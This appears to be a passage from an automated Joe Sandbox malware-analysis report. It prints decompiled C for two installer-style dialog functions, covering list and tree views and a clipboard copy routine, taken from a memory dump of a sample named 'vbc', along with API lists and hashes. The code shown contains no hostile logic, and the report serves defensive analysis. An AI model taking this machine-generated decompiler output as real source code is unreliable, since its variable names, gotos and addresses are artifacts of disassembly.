                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                          • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 00404F61 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420498;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x7fffffff
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x8c0fa0
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}



































                          0x00404f6a
                          0x00404f70
                          0x00404f79
                          0x00404f7c
                          0x0040510d
                          0x00405114
                          0x00405138
                          0x00405138
                          0x0040513e
                          0x0040514b
                          0x00405169
                          0x00405169
                          0x00405170
                          0x004051c7
                          0x004051c7
                          0x004051cb
                          0x00000000
                          0x00000000
                          0x004051cd
                          0x004051d0
                          0x00000000
                          0x00000000
                          0x004051da
                          0x004051e0
                          0x004051e2
                          0x004051e5
                          0x004052de
                          0x00000000
                          0x004052de
                          0x004051f4
                          0x00405200
                          0x00405206
                          0x00405209
                          0x0040520c
                          0x00405221
                          0x00405224
                          0x00405224
                          0x00405227
                          0x0040520e
                          0x00405213
                          0x00405219
                          0x0040521c
                          0x0040521c
                          0x00405237
                          0x0040523f
                          0x00405240
                          0x00405242
                          0x0040524b
                          0x0040524e
                          0x00405255
                          0x0040525c
                          0x00405264
                          0x00405264
                          0x00405272
                          0x00405278
                          0x0040527b
                          0x0040527b
                          0x00405282
                          0x00405288
                          0x00405291
                          0x00405298
                          0x004052a1
                          0x004052a3
                          0x004052a6
                          0x004052b5
                          0x004052b7
                          0x004052bd
                          0x004052be
                          0x004052bf
                          0x004052bf
                          0x004052c7
                          0x004052d2
                          0x004052d8
                          0x004052d8
                          0x00000000
                          0x00405242
                          0x00405172
                          0x00405178
                          0x004051a8
                          0x004051aa
                          0x004051b0
                          0x004051b2
                          0x004051bb
                          0x004051bb
                          0x004051c2
                          0x00000000
                          0x004051c2
                          0x0040517c
                          0x00405186
                          0x00000000
                          0x0040514d
                          0x0040514d
                          0x00405153
                          0x0040518b
                          0x00000000
                          0x00405194
                          0x0040515c
                          0x00405161
                          0x00405164
                          0x00000000
                          0x00405164
                          0x0040514b
                          0x00404f82
                          0x00404f86
                          0x00404f8f
                          0x00404f96
                          0x00404f99
                          0x00404f9c
                          0x00404f9f
                          0x00404fa0
                          0x00404fa1
                          0x00404fba
                          0x00404fbd
                          0x00404fc7
                          0x00404fd6
                          0x00404fde
                          0x00404fe6
                          0x00404feb
                          0x00404fee
                          0x00404ffa
                          0x00405003
                          0x0040500c
                          0x0040502f
                          0x00405035
                          0x00405046
                          0x0040504b
                          0x00405059
                          0x00405067
                          0x00405067
                          0x0040506c
                          0x0040507a
                          0x0040507a
                          0x0040507f
                          0x00405082
                          0x00405087
                          0x00405093
                          0x0040509c
                          0x004050a9
                          0x004050b8
                          0x004050ab
                          0x004050b0
                          0x004050b0
                          0x004050c4
                          0x004050c4
                          0x004050d8
                          0x004050e1
                          0x004050ea
                          0x004050fa
                          0x00405106
                          0x00405106
                          0x00000000

                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 00404FC0
                          • GetDlgItem.USER32(?,000003EE), ref: 00404FCF
                          • GetClientRect.USER32 ref: 0040500C
                          • GetSystemMetrics.USER32 ref: 00405014
                          • SendMessageA.USER32 ref: 00405035
                          • SendMessageA.USER32 ref: 00405046
                          • SendMessageA.USER32 ref: 00405059
                          • SendMessageA.USER32 ref: 00405067
                          • SendMessageA.USER32 ref: 0040507A
                          • ShowWindow.USER32(00000000,?), ref: 0040509C
                          • ShowWindow.USER32(?,00000008), ref: 004050B0
                          • GetDlgItem.USER32(?,000003EC), ref: 004050D1
                          • SendMessageA.USER32 ref: 004050E1
                          • SendMessageA.USER32 ref: 004050FA
                          • SendMessageA.USER32 ref: 00405106
                          • GetDlgItem.USER32(?,000003F8), ref: 00404FDE
                            • Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A
                          • GetDlgItem.USER32(?,000003EC), ref: 00405123
                          • CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
                          • CloseHandle.KERNEL32(00000000), ref: 00405138
                          • ShowWindow.USER32(00000000), ref: 0040515C
                          • ShowWindow.USER32(00000000,00000008), ref: 00405161
                          • ShowWindow.USER32(00000008), ref: 004051A8
                          • SendMessageA.USER32 ref: 004051DA
                          • CreatePopupMenu.USER32 ref: 004051EB
                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405200
                          • GetWindowRect.USER32 ref: 00405213
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                          • SendMessageA.USER32 ref: 00405272
                          • OpenClipboard.USER32(00000000), ref: 00405282
                          • EmptyClipboard.USER32 ref: 00405288
                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                          • GlobalLock.KERNEL32 ref: 0040529B
                          • SendMessageA.USER32 ref: 004052AF
                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                          • SetClipboardData.USER32 ref: 004052D2
                          • CloseClipboard.USER32 ref: 004052D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: {
                          • API String ID: 590372296-366298937
                          • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                          • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404772 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x8c114c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x8c0fa0
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420474;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42048c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420474 = _t315;
									 *0x42048c = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x1
										_v32 =  *0x42048c;
										_t196 =  *0x423ec8; // 0x8c114c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x8c223a
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x8c1154
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x8c1164
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42048c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                          0x00404790
                          0x00404796
                          0x00404798
                          0x0040479e
                          0x004047a4
                          0x004047a7
                          0x004047b1
                          0x004047ba
                          0x004047bd
                          0x004047c0
                          0x004049e8
                          0x004049e8
                          0x004049ef
                          0x00404a03
                          0x004049f1
                          0x004049f3
                          0x004049f6
                          0x004049f7
                          0x004049fe
                          0x004049fe
                          0x00404a06
                          0x00404a0f
                          0x00404a1a
                          0x00404a1a
                          0x00404a1d
                          0x00404a20
                          0x00404a2f
                          0x00404a2f
                          0x00404a36
                          0x00404aae
                          0x00404aae
                          0x00404ab1
                          0x00404ab3
                          0x00404ab6
                          0x00404abd
                          0x00404acb
                          0x00404acb
                          0x00404acd
                          0x00404ad0
                          0x00404ad7
                          0x00404ad9
                          0x00404add
                          0x00404afa
                          0x00404afe
                          0x00404afe
                          0x00404adf
                          0x00404aec
                          0x00404aec
                          0x00404add
                          0x00404ad7
                          0x00000000
                          0x00404ab1
                          0x00404a38
                          0x00404a3b
                          0x00404a46
                          0x00404a48
                          0x00404a4b
                          0x00404a52
                          0x00404a57
                          0x00404a59
                          0x00404a63
                          0x00404a63
                          0x00404a67
                          0x00404a69
                          0x00404a6c
                          0x00404a6e
                          0x00404a71
                          0x00404a87
                          0x00404a87
                          0x00404a73
                          0x00404a73
                          0x00404a79
                          0x00404a7b
                          0x00404a82
                          0x00404a7d
                          0x00404a7d
                          0x00404a7d
                          0x00404a7b
                          0x00404a8b
                          0x00404a8d
                          0x00404a92
                          0x00404a9b
                          0x00404a9c
                          0x00404aa6
                          0x00404aa6
                          0x00404aa8
                          0x00404aab
                          0x00404aab
                          0x00404a6c
                          0x00000000
                          0x00404a59
                          0x00404a3d
                          0x00404a40
                          0x00404a44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404a44
                          0x00404a22
                          0x00404a29
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404a11
                          0x00404a11
                          0x00404a14
                          0x00404b01
                          0x00404b01
                          0x00404b08
                          0x00404b7c
                          0x00404b7c
                          0x00404b83
                          0x00404b8f
                          0x00404b8f
                          0x00404b91
                          0x00404b98
                          0x00404b9a
                          0x00404b9f
                          0x00404ba1
                          0x00404ba4
                          0x00404ba4
                          0x00404baa
                          0x00404baf
                          0x00404bb1
                          0x00404bb4
                          0x00404bb4
                          0x00404bba
                          0x00404bc0
                          0x00404bc6
                          0x00404bc6
                          0x00404bcc
                          0x00404bd3
                          0x00404d20
                          0x00404d20
                          0x00404d27
                          0x00404d29
                          0x00404d30
                          0x00404d34
                          0x00404d41
                          0x00404d41
                          0x00404d44
                          0x00404d4a
                          0x00404d5c
                          0x00404d5c
                          0x00404d30
                          0x00000000
                          0x00404bd9
                          0x00404bdb
                          0x00404be0
                          0x00404be3
                          0x00404be7
                          0x00404be7
                          0x00404bec
                          0x00404bef
                          0x00404c30
                          0x00404c32
                          0x00404c3c
                          0x00404c42
                          0x00404c45
                          0x00404c4a
                          0x00404c51
                          0x00404c54
                          0x00404cf6
                          0x00404cfc
                          0x00404d02
                          0x00404d07
                          0x00404d0a
                          0x00404d1b
                          0x00404d1b
                          0x00000000
                          0x00404c5a
                          0x00404c5a
                          0x00404c5a
                          0x00404c5d
                          0x00404c63
                          0x00404c66
                          0x00404c68
                          0x00404c6a
                          0x00404c6c
                          0x00404c6f
                          0x00404c72
                          0x00404c79
                          0x00404c7b
                          0x00404c7e
                          0x00404c85
                          0x00404c88
                          0x00404c88
                          0x00404c88
                          0x00404c88
                          0x00404c8c
                          0x00404c8f
                          0x00404c9b
                          0x00404c9c
                          0x00404c9f
                          0x00404ca1
                          0x00404ca1
                          0x00404ca1
                          0x00404c91
                          0x00404c93
                          0x00404c93
                          0x00404cc0
                          0x00404cc0
                          0x00404cc1
                          0x00404ccd
                          0x00404cdc
                          0x00404cdc
                          0x00404cde
                          0x00404ce1
                          0x00404cea
                          0x00404cea
                          0x00000000
                          0x00404c5d
                          0x00404bf1
                          0x00404bfc
                          0x00404bff
                          0x00404c04
                          0x00404c06
                          0x00404c08
                          0x00404c0a
                          0x00404c1a
                          0x00404c24
                          0x00404c26
                          0x00404c29
                          0x00000000
                          0x00000000
